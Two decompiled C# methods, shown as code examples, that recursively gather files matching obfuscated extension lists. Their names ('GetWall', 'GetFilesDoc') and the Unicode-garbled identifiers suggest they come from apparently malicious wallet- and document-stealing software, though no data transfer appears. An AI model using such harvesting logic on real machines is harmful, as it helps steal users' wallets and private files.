Exemple #1
0
        // Token: 0x060000FE RID: 254 RVA: 0x00008F24 File Offset: 0x00007124
        public static List <string> GetWall(string path, string pattern)
        {
            List <string> list = new List <string>();

            try
            {
                list.AddRange(from s in Class_58.smethod_160(path, pattern, SearchOption.TopDirectoryOnly)
                              where Class_47.\u0339\u0020\u0360\u0020\u0489\u031D\u0353\u0355\u0309\u031B\u0317\u032F\u0349t\u031B\u0E47agscwneidpvfwade\u0E47\u030D\u0339\u0349\u035B\u0310\u035D\u030B\u0368\u0339\u032F\u0020\u0326\u034E\u0E47\u0347vslhdzgbbwcktuah.Contains(Path.GetExtension(s).ToLower())
                              select s);
                foreach (string path2 in Directory.GetDirectories(path))
                {
                    try
                    {
                        list.AddRange(Class_47.GetWall(path2, pattern));
                    }
                    catch
                    {
                    }
                }
            }
            catch
            {
            }
            return(list);
        }
Exemple #2
0
        // Token: 0x060000FD RID: 253 RVA: 0x00008E74 File Offset: 0x00007074
        public static List <string> GetFilesDoc(string path, string pattern)
        {
            List <string> list = new List <string>();

            try
            {
                list.AddRange(from s in Class_58.smethod_160(path, pattern, SearchOption.TopDirectoryOnly)
                              where Class_84.\u0489\u0E47\u034F\u0020\u0348\u032F\u032B\u0315\u0339\u036F\u0020\u0354\u0331\u030E\u032F\u0020nhxjglgcxywtuowp\u0342\u0317\u0347\u0020i\u0303\u035F\u0306\u0020\u0331\u032F\u032B\u0020\u033C\u0E47\u0020vdtjdpxsqbpulbec.Contains(Path.GetExtension(s).ToLower())
                              select s);
                foreach (string path2 in Directory.GetDirectories(path))
                {
                    try
                    {
                        list.AddRange(Class_47.GetFilesDoc(path2, pattern));
                    }
                    catch
                    {
                    }
                }
            }
            catch
            {
            }
            return(list);
        }